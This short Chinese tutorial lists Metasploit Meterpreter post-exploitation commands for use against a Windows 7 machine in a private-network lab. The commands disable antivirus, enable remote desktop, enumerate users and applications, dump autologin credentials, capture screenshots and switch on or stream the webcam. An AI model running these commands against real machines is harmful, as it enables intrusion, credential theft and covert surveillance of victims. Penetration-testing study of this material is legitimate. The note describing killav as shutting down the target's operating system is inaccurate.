metasploit攻击windows7
攻击主机IP:192.168.1.106
目标主机IP:192.168.1.105
总之只要进来了,就可以做很多事情,大家也可以自己尝试。
例如:
- 输入background命令将当前会话放到后台
- 输入getuid命令查看当前目标机器上已经渗透成功的用户名
- 输入run post/windows/manage/killav命令关闭目标机操作系统
- 输入run post/windows/manage/enable_rdp命令启动目标机的远程桌面协议,也就是常说的3389端口
- 输入run post/windows/manage/autoroute命令查看目标机的本地子网情况
- 输入run post/windows/gather/enum_logged_on_users命令列举当前有多少用户登陆了目标机
- 输入 run post/windows/gather/enum_applications命令列举安装在目标机上的应用程序
- run windows/gather/credentials/windows_autologin 抓取用户自动登录的用户名和密码
- 输入load espia命令加载Espia插件,然后输入screengrab命令就可以抓取此时目标机的屏幕截图
- webcam_list 查看目标机有没有摄像头
- 输入webcam_snap命令打开目标机摄像头并拍摄一照片
- 输入webcam_stream命令甚至还可以开启直播模式
- 输入shell命令进入目标机shell下面